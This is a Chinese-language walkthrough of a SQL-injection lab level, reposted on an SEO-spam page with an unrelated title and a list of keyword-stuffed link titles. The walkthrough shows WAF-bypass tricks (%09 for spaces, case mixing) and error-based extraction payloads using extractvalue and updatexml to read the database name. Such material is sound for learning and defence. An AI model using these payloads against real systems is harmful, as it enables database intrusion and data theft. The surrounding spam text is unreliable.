当前位置: 首页 > news >正文

python 做电商网站郑州网站开发顾问

python 做电商网站,郑州网站开发顾问,网站代办备案,网络规划设计师 第2版 ed2k知识点&#xff1a; union select 关键字过滤 通过<> /**/进行截断处理 un<>ion sel<>ect 没效果uni/**/on sel/**/ect 被过滤了双写绕过 这关对select进行了多重过滤&#xff0c;无法进行双写绕过 大小写绕过 UNion SElect (这关可以用&am…

知识点:

  • union select 关键字过滤
    • 通过<> /**/进行截断处理
      • un<>ion  sel<>ect     没效果
      • uni/**/on sel/**/ect     被过滤了
    • 双写绕过     
      • 这关对select进行了多重过滤,无法进行双写绕过 
    • 大小写绕过
      • UNion SElect   (这关可以用,不演示了)
  • 空格过滤
    • %09 %0a %0b %0c %0d 进行绕过
    • 这关+和%20被过滤了,但是可以用上面的几种形式代替
  • 错误注入
    • extractvalue(1,concat(0x7e,database(),0x7e))
    • updatexml(1,concat(0x7e,database(),0x7e),1)
    • 最多展示32位,超过部分需要用截取函数处理

测试注入类型

构造payload:id=1'

构造payload:id=1''

测试发现是字符型注入

经过不断的测试发现空格和+被过滤了,发现%09可以代替空格绕过检测

构造payload:id=1'%09and%091='1

页面成功回显出了相关信息,说明绕过成功

页面给出了提示,联合查询关键字被过滤了,直接使用错误注入

构造payload:id=1'%09and%09exp(710)='1

页面成功回显除了exp()函数的错误信息

尝试获取数据库名

构造payload:id=1'%09and%09extractvalue(1,concat(0x7e,database(),0x7e))='1

成功获取到了数据库名;结束收工

10

http://www.yidumall.com/news/104324.html

相关文章:

  • 域名还没备案可以做网站吗如何制作一个自己的网页网站
  • 建设网站的命令app推广代理加盟
  • 做ppt的兼职网站网络推广seo怎么弄
  • 纪检部门网站举报建设查排名
  • 网站搭建哪家好国内永久免费建站
  • 法律顾问 网站 源码最近一周的国内新闻
  • 做网站的教学视频seo信息是什么
  • 青海公路建设服务网站怎样宣传自己的品牌
  • 东莞医院网站建设口碑营销的特征
  • 自己网站开发百度快照网址
  • 个人博客网站实验报告学校seo推广培训班
  • 网站积分解决方案郑州seo哪家好
  • 什么语言开发网站百度的网址是什么
  • 简单的j网站建设方案书网络营销与策划试题及答案
  • 响应式营销网站百度排名优化专家
  • 销售部网站建设费牡丹江seo
  • 天眼查询企业信息官网电话抖音seo关键词排名技术
  • 射阳建设局网站东莞疫情最新消息今天中高风险区
  • 增城移动网站建设网站优化seo怎么做
  • 网站建设的模板最好用的搜索神器
  • 莱州市住房和规划建设管理局网站网络营销图片
  • 山东济宁网站建设抚顺网站建设
  • 石家庄做网站的公司有哪些品牌宣传的推广
  • 企业数字化管理seo官网优化
  • 做网站建设的电销南昌搜索引擎优化
  • 宝安区网站建设公司视频号排名优化帝搜软件
  • 常州网站建设效果seo公司网站推广
  • 怎么做网站301重定向公关服务
  • 政府部门网站建设怎么免费注册域名
  • 上海网站排名公司员工培训